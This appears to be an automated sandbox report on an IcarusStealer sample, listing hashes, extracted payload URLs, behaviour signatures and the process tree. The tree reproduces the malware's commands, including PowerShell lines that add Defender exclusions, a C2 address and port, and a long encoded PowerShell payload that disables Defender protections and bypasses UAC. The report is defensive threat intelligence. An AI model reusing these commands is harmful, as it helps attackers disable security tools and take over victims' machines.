Overview

overview

10

Static

static

3

icarusokay.exe

windows10-2004-x64

Analysis

  • max time kernel
    160s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/09/2024, 02:18

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    icarusokay.exe

  • Size

    494KB

  • MD5

    a960b054b2d055d60ad7d93d2ede01f8

  • SHA1

    f19fce2fc2e2e52db169e1ece0845ff162e844cd

  • SHA256

    65409873f2564f68f5f8cdc465f395de884ad276168881c03163dc409c7239b3

  • SHA512

    dabd847829c4bdc8639c6171c819e53e5dddc2d1903a322e803633ffc8e6c1eba7ed21f9490c07454fd8c240e0d075a313516835be119023ea9488b3b29fb914

  • SSDEEP

    12288:KxMFSuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Q0:G9Z6N6LqQzJqkb

Score
10/10
icarusstealerdiscoveryevasionexecutionpersistencestealertrojan

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 39 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 35 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\icarusokay.exe
    "C:\Users\Admin\AppData\Local\Temp\icarusokay.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4012
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3108
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.21 37029 vUiuCXqqM
      2⤵
        PID:4140
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.21 37029 vUiuCXqqM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3736
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4100
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4356
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2472
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4764
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xybu4d5q\xybu4d5q.cmdline"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D0D.tmp" "c:\Users\Admin\AppData\Local\Temp\xybu4d5q\CSCB281B69A6145420BB5C54E4B9B53BBB0.TMP"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4892
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4400
          • C:\Windows\SysWOW64\shutdown.exe
            shutdown /r /t 0
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4696
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxpftdmg\sxpftdmg.cmdline"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3476
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD11.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC57A2C2CFE9694AAEB9A9A9D05636D9CF.TMP"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3804
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe & exit
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4320
          • C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
            C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:932
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM SMSHoists.exe
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:208
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM SMSHoists.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4204
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAH